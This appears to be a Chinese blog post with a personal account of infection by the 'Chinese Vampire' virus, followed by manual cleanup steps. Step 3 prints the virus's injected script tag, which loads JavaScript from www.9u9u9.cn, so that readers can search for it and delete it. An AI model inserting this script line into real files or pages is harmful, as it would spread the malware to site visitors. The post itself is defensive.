切勿相信网上流传的中华吸血鬼病毒下载，那些都是带病毒的客户端执行程序，我就是因为好奇心所以在黑白网络下载了该软件，病毒把我的备份GHO也删了。好奇害死人～～～

废话不说，步入杀毒正题：

1. 用暴力删除（附件2）删除%systemroot%\Tasks\下的所有文件，当然首先要先备份好你的任务计划
    
2. 用专&杀工具（附件3）清除所有文件夹下的wsock32.dll和RAR里面的绿化.BAT
   
3. 用超级文本替换（附件1）查找

   <script language="javascript" src="http://www.9u9u9.cn/pcgames/wowchina.js"></script>

   替换成空
   从C盘依次到最后盘符，务必清除干净！
   
4. 清空hosts（%systemroot%\system32\drivers\etc目录下）文件，然后加入

   127.0.0.1 www.9u9u9.cn

   这一条，防着点好！

经过这次的教训总结出以下两点经验

1. 千万不要跟病毒或非法软件打交道，哪怕仅仅是测试也不要，防不胜防啊
2. GHOST备份文件要记得改后缀名，很多病毒都冲着这个GHO后缀来的！

附件1：超级文本替换.rar (373 KB)
附件2：KillBox.rar (529 KB)
附件3：KIllXXG.rar (512 KB)

Tags: 中华吸血鬼, 病毒, 解决

加载中...